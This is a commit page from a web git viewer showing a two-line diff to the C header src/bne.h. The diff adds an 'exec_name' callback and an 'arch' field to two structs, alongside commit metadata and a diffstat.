diff options
author | David Timber <mieabby@gmail.com> | 2020-09-19 03:15:28 +0930 |
---|---|---|
committer | David Timber <mieabby@gmail.com> | 2020-09-19 03:15:28 +0930 |
commit | 66a17c4bf5c38579e460209c2028d3275f366121 (patch) | |
tree | e169276fb0b1686abb01c0c5e794e96aaa253e13 /src/bne.h | |
parent | 54166c46f32555532dc3c0e922fe6a591cb74128 (diff) |
Impl bne
Diffstat (limited to 'src/bne.h')
-rw-r--r-- | src/bne.h | 2 |
1 files changed, 2 insertions, 0 deletions
@@ -32,6 +32,7 @@ struct prne_bne_param { size_t cnt; } vector; struct { + char *(*exec_name)(void); bool (*enter_dd)(void); void (*exit_dd)(void); } cb; @@ -56,6 +57,7 @@ struct prne_bne_result { int err; prne_bne_vector_t vec; prne_pack_rc_t prc; + prne_arch_t arch; }; void prne_init_bne_param (prne_bne_param_t *p); |